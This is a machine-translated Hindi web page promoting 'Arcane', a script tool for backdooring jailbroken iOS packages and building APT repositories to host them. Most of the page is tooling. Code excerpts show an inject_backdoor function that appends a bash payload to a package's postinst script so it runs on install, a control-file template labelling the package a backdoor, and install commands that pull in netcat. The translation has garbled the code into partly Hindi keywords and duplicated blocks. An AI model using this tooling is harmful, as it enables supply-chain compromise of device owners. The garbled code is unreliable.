आर्केन आईओएस पैकेज (iPhone ARM) को बैकडोर करने और APT रिपॉजिटरी के लिए आवश्यक संसाधन बनाने के लिए एक सरल स्क्रिप्ट टूल है।
यह यह स्पष्ट करने में मदद करने के लिए बनाया गया था कि क्यों Cydia रिपॉजिटरी खतरनाक हो सकती है और एक समझौता किए गए iOS डिवाइस से शोषण के बाद के हमले संभव हैं।
Contents
कैसे रहस्यमय उपकरण पिछले आईओएस पैकेज काम करता है
एप्लिकेशन इंस्टॉल या हटाते समय स्क्रिप्ट को पैकेज के हिस्से के रूप में आपूर्ति करना संभव है। पैकेज अनुरक्षक स्क्रिप्ट में शामिल हैं preinst, postinst, prerm
, तथा postrm
फ़ाइलें। अर्केन इसका फायदा उठाता है postinst
स्थापना के दौरान कमांड निष्पादित करने के लिए फ़ाइल।
# “पोस्ट-इंस्टॉलेशन” फ़ाइल। यह फ़ाइल आमतौर पर ज़िम्मेदार है
# आवश्यक स्थापित करने के बाद ओएस पर कमांड निष्पादित करने के लिए
# फाइलें। इसका उपयोग डेवलपर्स द्वारा विभिन्न प्रबंधन और रखरखाव के लिए किया जाता है
# एक इंस्टालेशन के पहलू। रहस्यमय इस कार्यक्षमता का दुरुपयोग करता है
# दुर्भावनापूर्ण बैश को फ़ाइल में जोड़ना।
postinst = “$ tmp / Debian / postinst”;
# कमांड निष्पादन के प्रकार को संभालने के लिए एक फ़ंक्शन
# पोस्टस्क्रिप्ट फ़ाइल।
फ़ंक्शन injection_backdoor ()
{
# यदि ‘फ़ाइल’ का प्रयोग किया जाता है, तो पोस्टस्टीन फ़ाइल में ‘cat’ कमांड (s)।
अगर [[ “$infile” ]]; फिर
बिल्ली “$ शिशु” >> “$ पोस्टइन”;
एम्बेड = “[$infile]”;
अन्य
# यदि नहीं – तो, पहले साधारण बैश पेलोड का उपयोग करें
# परिभाषित।
इको-ई “$ पेलोड” >> “$ पोस्टस्टीन”;
एम्बेड = “सामान्य शेल कमांड”;
फाई;
स्थिति “पोस्टस्टीन में $ एम्बेड एम्बेड” “बैकडोर एम्बेडिंग त्रुटि”;
chmod 0755 “$ पोस्टस्टीन”
};
1 2 3 4 5 6 7 8 9 10 1 1 12 13 14 15 16 17 18 19 20 21 22 23 24 |
# “पोस्ट-इंस्टॉलेशन” फ़ाइल। यह फ़ाइल आमतौर पर ज़िम्मेदार है # आवश्यक स्थापित करने के बाद ओएस पर कमांड निष्पादित करने के लिए # फाइलें। इसका उपयोग डेवलपर्स द्वारा विभिन्न प्रबंधन और रखरखाव के लिए किया जाता है # एक इंस्टालेशन के पहलू। रहस्यमय इस कार्यक्षमता का दुरुपयोग करता है # दुर्भावनापूर्ण बैश को फ़ाइल में जोड़ना। postinst=“$ Tmp / Debian / postinst”; # कमांड निष्पादन के प्रकार को संभालने के लिए एक फ़ंक्शन # पोस्टस्क्रिप्ट फ़ाइल। समारोह inject_backdoor () { # यदि ‘फ़ाइल’ का प्रयोग किया जाता है, तो पोस्टस्टीन फ़ाइल में ‘cat’ कमांड (s)। अगर [[[[ “$ Infile” ]]; फिर बिल्ली “$ Infile” >> “$ Postinst”; एम्बेड=“[$infile]”; अन्य # यदि नहीं – तो, पहले साधारण बैश पेलोड का उपयोग करें # परिभाषित। गूंज –इ “$ पेलोड” >> “$ Postinst”; एम्बेड=“सामान्य शेल कमांड”; फाई; स्थिति “पोस्टस्टीन में एम्बेडेड $ एम्बेड” “त्रुटि पिछले दरवाजे एम्बेड”; chmod 0755 “$ Postinst” }; |
control
फ़ाइल में वे मान होते हैं जो संकुल प्रबंधन उपकरण संकुल को स्थापित करते समय उपयोग करते हैं। आर्कन या तो किसी मौजूदा को संशोधित करेगा control
या इसे बना सकते हैं।
# “नियंत्रण” फ़ाइल टेम्पलेट। अधिकांश iOS पैकेजों में a शामिल होगा
# नियंत्रण फ़ाइल। घटना में एक नहीं मिला है, अर्केन का उपयोग करेगा
# नीचे टेम्पलेट। यहां कब्जा करने के लिए `$ हैकर` चर का उपयोग किया जाता है
# विभिन्न मनमाने क्षेत्र।
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp = “पैकेज: com। $ hacker.backdoor
नाम: $ हैकर पिछले दरवाजे
संस्करण: 1337
अनुभाग: ऐप
वास्तुकला: iphoneos- हाथ
विवरण: एक backdoored iOS पैकेज
लेखक: $ हैकर
मेंटेनर: $ हैकर
…
# नियंत्रण फ़ाइल के लिए जाँच करने के लिए एक fileif` कथन।
अगर [[ ! -f “$tmp/DEBIAN/control” ]]; फिर
# यदि कोई नियंत्रण नहीं पाया गया है, तो इसे टेम्पलेट का उपयोग करके बनाएं।
इको “$ controlTemp”> “$ tmp / DEBIAN / नियंत्रण”;
स्थिति “निर्मित नियंत्रण फ़ाइल” “नियंत्रण टेम्पलेट के साथ त्रुटि”;
अन्य
# यदि एक नियंत्रण फ़ाइल मौजूद है, तो आर्कन केवल पैकेज का नाम बदलेगा
# जैसा कि यह उपलब्ध Cydia अनुप्रयोगों की सूची में दिखाई देता है। यह
# Cydia में स्थान के लिए पैकेज को आसान बनाता है।
संदेश “पता चला नियंत्रण फ़ाइल” succ;
sed -i ‘0, / ^ नाम:। * / s // नाम: $ हैकर पिछले दरवाजे /’ “$ tmp / DEBIAN / नियंत्रण”;
स्थिति “संशोधित नियंत्रण फ़ाइल” “नियंत्रण के साथ त्रुटि”;
फाई;
1 2 3 4 5 6 7 8 9 10 1 1 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# “नियंत्रण” फ़ाइल टेम्पलेट। अधिकांश iOS पैकेजों में a शामिल होगा # नियंत्रण फ़ाइल। घटना में एक नहीं मिला है, अर्केन का उपयोग करेगा # नीचे टेम्पलेट। यहां कब्जा करने के लिए `$ हैकर` चर का उपयोग किया जाता है # विभिन्न मनमाने क्षेत्र। # https://www.debian.org/doc/manuals/maint-guide/dreq.en.html controlTemp=“पैकेज: com। $ Hacker.backdoor नाम: $ हैकर पिछले दरवाजे संस्करण: 1337 अनुभाग: ऐप वास्तुकला: iphoneos- हाथ विवरण: एक backdoored iOS पैकेज लेखक: $ हैकर मेंटेनर: $ हैकर ।।। # नियंत्रण फ़ाइल के लिए जाँच करने के लिए एक fileif` कथन। अगर [[[[ ! –च “$ Tmp / Debian / नियंत्रण” ]]; फिर # यदि कोई नियंत्रण नहीं पाया गया है, तो इसे टेम्पलेट का उपयोग करके बनाएं। गूंज “$ ControlTemp” > “$ Tmp / Debian / नियंत्रण”; स्थिति “बनाई गई नियंत्रण फ़ाइल” “नियंत्रण टेम्पलेट के साथ त्रुटि”; अन्य # यदि एक नियंत्रण फ़ाइल मौजूद है, तो आर्कन केवल पैकेज का नाम बदलेगा # जैसा कि यह उपलब्ध Cydia अनुप्रयोगों की सूची में दिखाई देता है। यह # Cydia में स्थान के लिए पैकेज को आसान बनाता है। संदेश “नियंत्रण फ़ाइल का पता चला” succ; sed –मैं ‘0, / ^ नाम:। * / s // नाम: $ हैकर पिछले दरवाजे /’ “$ Tmp / Debian / नियंत्रण”; स्थिति “संशोधित नियंत्रण फ़ाइल” “नियंत्रण के साथ त्रुटि”; फाई; |
आर्काय टूल टू बैकडोर आईओएस पैकेज कैसे स्थापित करें
काली v2020.3 के लिए अनुशंसित:
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-पारंपरिक dpkg coreutils # निर्भरताएँ
sudo git clone https://github.com/tokyoneon/arcane / opt / arcane
sudo chown $ USER: $ USER -R / opt / arcane /; सीडी / ऑप्ट / आर्कन
chmod + x arcane.sh ;;/ arcane.sh –help
sudo उपयुक्त–प्राप्त अपडेट करें; sudo उपयुक्त–प्राप्त इंस्टॉल –Vy bzip2 netcat–परंपरागत dpkg coreutils # निर्भरता sudo Git क्लोन https://github.com/tokyoneon/arcane / opt / arcane sudo chown $उपयोगकर्ता:$उपयोगकर्ता –आर /चुनना/भेद का/; सीडी /चुनना/भेद का chmod +एक्स भेद का।श;।/भेद का।श –मदद |
आप यहां आर्कन डाउनलोड कर सकते हैं:
Arcane-master.zip
या यहाँ और अधिक पढ़ें।